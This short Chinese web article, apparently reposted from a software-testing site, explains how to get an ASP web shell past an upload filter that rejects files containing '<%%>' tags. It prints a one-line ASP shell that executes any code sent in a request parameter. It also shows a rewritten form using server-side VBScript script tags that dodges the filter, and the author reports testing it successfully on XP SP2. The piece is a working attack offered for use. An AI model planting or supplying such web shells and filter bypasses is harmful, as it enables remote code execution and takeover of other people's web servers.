以前好多朋友说过就是在程序上传shell过程中,程序不允许包含<%%>标记符号的内容的文件上传,
这样就有好多shell不能上传上去了!那我们是不就没别的方法了么,当然有了!呵呵!
我们拿蓝屏最小的asp木马来看下:
以下是引用片段:
<%execute request("l")%>
我们来把他的标签换下来:
以下是引用片段:
<script language=VBScript runat=server>execute request("l")</Script>
呵呵!这样就避开了使用<%%>,保存为.asp,程序照样执行,效果一样的说!
偶在xpsp2下测试成功!
延伸阅读
文章来源于领测软件测试网 https://www.ltesting.net/